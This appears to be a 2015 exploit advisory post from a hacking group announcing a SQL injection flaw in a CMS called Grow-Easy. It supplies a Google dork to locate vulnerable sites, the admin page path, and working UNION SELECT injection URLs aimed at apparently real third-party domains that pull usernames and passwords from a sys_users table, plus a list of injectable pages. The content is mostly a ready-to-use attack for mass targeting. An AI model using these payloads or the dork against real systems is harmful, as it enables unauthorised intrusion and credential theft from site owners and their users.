[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Exploit Title : Grow-Easy CMS SQL Injection Vulnerability [+] [+] Exploit Author : Ashiyane Digital Security Team [+] [+] Google Dork : inurl:"newsList.php?catalog=" [+] [+] Admin Page: Site.com/cms [+] [+] Date: 2015 August 10 [+] [+] Tested On : Kali Linux , BackTrack [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Examples and Explanations : Vulnerabilities Are On The Pages Wich Get The id Of Query From GET Method(URL).And Can Get The Login Info From The Same Method group_concat(name,0x3a,password) from sys_users. [+] [+]www.marscctXv.net/newsDetail.php?id=4 AND 0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,group_concat(name,0x3a,password) from sys_users --+ [+] [+]https://esatXcom.com/newsList.php?catalog=146 AND 0 UNION SELECT 1,2,group_concat(name,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from sys_users --+ [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Pages : [+] [+] productList.php?catalog=177' [+] [+] newsDetail.php?id=1501' [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Discovered by : The Nonexistent [+] Special Thanks : All Ashiyane Members And Exploiting Team. [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]